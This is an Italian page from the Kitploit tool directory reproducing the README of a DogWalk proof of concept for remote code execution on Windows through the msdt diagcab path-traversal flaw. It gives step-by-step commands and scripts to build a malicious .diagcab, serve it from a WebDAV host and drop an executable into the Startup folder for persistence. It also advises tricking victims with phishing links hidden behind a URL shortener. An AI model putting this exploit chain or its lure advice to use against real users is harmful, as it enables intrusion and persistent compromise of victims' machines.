Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DogWalk-rce-poc — 🐾Dogwalk PoC (usando file diagcab per ottenere RCE su Windows) | Kitploit
Strumenti/GitHubGitHub/ariary/dogwalk-rce-poc
Generazione di PayloadMeccanismi di PersistenzaExploitPenetration Testing
GitHubariary/dogwalk-rce-poc

DogWalk-rce-poc

🐾Dogwalk PoC (usando file diagcab per ottenere RCE su Windows)

Vedi Repository
76144 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dogwalk Proof-of-Concept🐾

root@kitploit:~

🚨 Disclaimer 🚨



La PoC consente a un attaccante di ottenere Remote Code Injection su un dispositivo Windows della vittima.
L'obiettivo di questo repo è rendere una PoC ancora più utilizzabile del <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>repo iniziale.
NON USARLA SENZA PREVIA AUTORIZZAZIONE!

Considerando i danni causati e la semplicità di sfruttamento, spero che Microsoft la sistemi
Aggiornamento luglio 2022: Microsoft non ha ancora corretto la vulnerabilità in msdt ma Microsoft Defender è in grado di individuarla

  • 🧠 Capire come funziona
  • 🐾 Eseguirla
  • 📺 Mostrami

Concetto fondamentale: vulnerabilità di path traversal nella tecnologia Diagcab di Microsoft (msdt) che potrebbe portare all'esecuzione di codice remota.
Puoi trovare l'advisory completo nel post del blog
La vulnerabilità è stata segnalata da 2 anni (da @irsl) e non ha ancora alcuna correzione!

Come funziona?

La Proof-of-Concept configura un server webdav che ospita un file .diagcab malevolo che eseguirà un path traversal per scrivere un eseguibile malevolo in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Scrivere un eseguibile in questa cartella lo eseguirà ogni volta che l'utente avvia la macchina Windows; questa tecnica è chiamata Boot Logon Autostart Execution.

Quindi, in pratica, ciò che ci serve è:

  • server webDAV
  • File .diagcab malevolo
  • Eseguibile malevolo (uno legittimo o un semplice file di testo è sufficiente per la PoC)

🎬 Scenario

  1. La vittima visiterà un link (phishing, social engineering, o qualsiasi altra cosa) che scaricherà il file .diagcab

(💡 usa l'header di risposta Content-type: application/octet-stream per fare sì che il browser scarichi automaticamente il file quando si visita l'URL)

  1. La vittima fa clic sul file scaricato (può succedere facilmente/per sbaglio semplicemente cliccando sulla cartella di download del browser)
  2. Il file cab carica l'eseguibile malevolo webdav -> (path traversal) scaricato nel menu Start
  3. L'utente riavvia il suo dispositivo -> (RCE)

Mettiamola in pratica

Se sei troppo pigro (o hai fretta) per procedere passo dopo passo:

root@kitploit:~
./hurry-dogwalk.sh [WEBDAV_URL]         # need docker
# Stop the server
./hurry-dogwalk.sh --clean

Altrimenti ↓↓

🔨 Costruisci il file .diagcab

I file .diagcfg sono semplici file XML che contengono riferimenti a uno o più pacchetti di diagnostica e forniscono meta-informazioni su di essi. Vengono impacchettati in archivi cabinet di Microsoft e salvati con estensione .diagcab.

Per prima cosa costruisci custom.diagcfg:

root@kitploit:~
./build-malicious-diagcfg.sh --url [WEBDAV_URL]

E costruisci il file hotfix895214.diagcab:

root@kitploit:~
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe

Infine, spostalo nella directory ./webdav/diagcab-webdav-poc/config

🏗️ Configura il server

Metti l'eseguibile che vuoi trasferire sulla macchina vittima nella directory ./webdav/malicious... (Qui usiamo la classica calc.exe)

...E avvia il server:

root@kitploit:~
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl

Il file .diagcab malevolo è disponibile all'indirizzo https://[WEBDAV_URL]/config/hotfix895214.diagcab. Ora devi indurre una vittima a fare clic su questo link.

(💡puoi usare un accorciatore di URL per renderlo meno sospetto)

👁️ Aspetta e guarda

Configurazione di Dogwalk

💡 di default, sembra che le comunicazioni webdav non siano abilitate. Vedi mitigations.txt per una soluzione alternativa per farlo funzionare

🐾🐾

demo

Scarica lo strumento